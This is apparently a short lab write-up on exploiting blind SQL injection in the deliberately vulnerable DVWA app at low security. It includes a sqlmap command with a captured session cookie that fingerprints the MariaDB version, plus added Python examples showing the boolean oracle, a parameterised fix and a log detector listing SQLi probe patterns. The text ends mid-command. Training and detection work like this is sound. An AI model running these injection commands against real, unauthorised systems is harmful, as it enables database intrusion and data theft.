07/02/2022
DVWA exploit SQL Injection (Blind) at Low Level
When an attacker executes SQL injection attacks, the server sometimes responds with error messages from the database server complaining that the SQL query's syntax is incorrect. Blind SQL injection is identical to normal SQL injection except that when an attacker attempts to exploit an application, rather than getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL injection vulnerability more difficult, but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements and monitoring how the web application responds (a valid entry is returned, or a 404 header is set).
The "time based" injection method is often used when there is no visible difference in how the page responds (hence it is a blind attack). Instead, the attacker measures how long the page takes to respond; if it takes longer than normal, their query was successful.
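To make the True/False oracle described above concrete, and to show what closes it, here is an added example (not DVWA's own PHP code, and not from the original post). It uses an in-memory SQLite table standing in for DVWA's users table, a lookup that splices the id into the SQL text the way the low-security level does, and a parameterised lookup. The `oracle_leaks` check appends a true and a false condition to a valid id and reports whether the two lookups answer differently, which is exactly the signal a blind attack relies on; the table contents, function names and probe strings are constructed for the demonstration.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for DVWA's users table (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> bool:
    """Low-level style: the untrusted value is concatenated into the query text,
    so any SQL inside it is parsed and executed by the database."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchone() is not None

def lookup_hardened(conn: sqlite3.Connection, user_id: str) -> bool:
    """Parameterised query: the value is bound as data and never parsed as SQL,
    so an appended condition is just a string that matches no user_id."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchone() is not None

def oracle_leaks(lookup, conn: sqlite3.Connection) -> bool:
    """True if the lookup can be used as a boolean oracle: a valid id with a
    true condition appended and the same id with a false condition appended
    produce different answers. Both probes are constructed for this check."""
    true_probe = "1' AND '1'='1"
    false_probe = "1' AND '1'='2"
    return lookup(conn, true_probe) != lookup(conn, false_probe)

if __name__ == "__main__":
    db = make_db()
    # The vulnerable lookup answers the question; the hardened one does not.
    print("vulnerable lookup is a boolean oracle:", oracle_leaks(lookup_vulnerable, db))
    print("hardened lookup is a boolean oracle:  ", oracle_leaks(lookup_hardened, db))
    # Normal input still works through the hardened path.
    print("hardened lookup finds user 1:         ", lookup_hardened(db, "1"))
```

The point of the comparison is that the blind technique does not need error messages at all: a page that merely differs between "entry found" and "entry not found" is enough, and only binding the value as a parameter (or equivalent strict validation) removes that difference for hostile input.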
Objective
Find the version of the SQL database software through a blind SQL attack.
For this exploit we will use sqlmap and Burp Suite.
We need to intercept the request because the site uses cookies, and sqlmap needs this cookie to reach the vulnerable page.
Insert a value into the text box: 1
Capture the request with Burp Suite.
Cookie: security=low; PHPSESSID=bdabcae42a3fd6d726ec51e1dbe731df
Copy the cookie and the link.
To find the version of the SQL database software we run this command:
root@blackbox:/opt/lampp # sqlmap -u "http://192.168.1.4/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit #" --cookie="security=low; PHPSESSID=bdabcae42a3fd6d726ec51e1dbe731df" -f --banner --dbs
back-end DBMS: active fingerprint: MySQL >= 5.5
comment injection fingerprint: MySQL 5.6.49
banner parsing fingerprint: MySQL 10.1.37
fork fingerprint: MariaDB
banner: '10.1.37-MariaDB'
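From the defender's side, a run like the one above leaves a very recognisable trail in the web server's access log: many requests to the same endpoint from one client, id values carrying quotes, appended AND/OR conditions, comment markers or time-delay functions, and, unless the operator changes it, sqlmap's default User-Agent naming the tool. The following is an added example (not from the original post and not part of DVWA or sqlmap) that parses Apache combined-format log lines, flags requests whose query parameters match blind-SQLi patterns or whose User-Agent identifies sqlmap, and counts flagged requests per client. The log lines, addresses, timestamps and User-Agent strings are constructed for the example.

```python
import re
from collections import Counter
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Constructed sample lines in Apache "combined" format; hosts, times and values are made up.
SAMPLE_LOG = """\
192.168.1.50 - - [07/Feb/2022:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
192.168.1.99 - - [07/Feb/2022:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20AND%20%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.6 (https://sqlmap.org)"
192.168.1.99 - - [07/Feb/2022:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20AND%20SLEEP%285%29%23&Submit=Submit HTTP/1.1" 200 4300 "-" "sqlmap/1.6 (https://sqlmap.org)"
192.168.1.99 - - [07/Feb/2022:10:00:06 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.6 (https://sqlmap.org)"
192.168.1.50 - - [07/Feb/2022:10:00:09 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns applied to each decoded query-parameter value.
SQLI_PATTERNS = [
    re.compile(r"['\"]"),                                       # quote that breaks out of a literal
    re.compile(r"\b(AND|OR)\b\s*['\"]?\w*['\"]?\s*=", re.I),    # appended boolean condition
    re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b", re.I),  # time-based primitives
    re.compile(r"(--|#|/\*)"),                                  # comment marker swallowing the query tail
]

def classify_request(line: str) -> Optional[dict]:
    """Parse one log line and return its fields plus the reasons it looks like SQLi probing."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m["target"])
    params = parse_qs(parsed.query, keep_blank_values=True)  # parse_qs URL-decodes the values
    reasons = []
    for name, values in params.items():
        for value in values:
            hits = [p.pattern for p in SQLI_PATTERNS if p.search(value)]
            if hits:
                reasons.append(f"param {name!r} matches {len(hits)} SQLi pattern(s): {value!r}")
    if "sqlmap" in m["ua"].lower():  # sqlmap's default User-Agent names the tool
        reasons.append("User-Agent identifies sqlmap")
    return {"ip": m["ip"], "path": parsed.path, "ua": m["ua"], "reasons": reasons}

def analyze(log_text: str):
    """Return the flagged requests and a per-client count of flagged requests."""
    flagged = []
    per_ip: Counter = Counter()
    for line in log_text.splitlines():
        info = classify_request(line)
        if info and info["reasons"]:
            flagged.append(info)
            per_ip[info["ip"]] += 1
    return flagged, per_ip

if __name__ == "__main__":
    hits, counts = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["path"], "->", "; ".join(h["reasons"]))
    print("flagged requests per client:", dict(counts))
```

In a real deployment the per-client counter is the part worth alerting on: a single quote in an id is occasionally a typo, but dozens of flagged requests to one endpoint from one address inside a few seconds is scanner behaviour, and the `--random-agent` style evasion only removes the User-Agent reason, not the parameter patterns or the request rate.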
We can obviously get more....
root@blackbox:/opt/lampp # sqlmap -u "http://192.168.1.8/dvwa/vulnerabi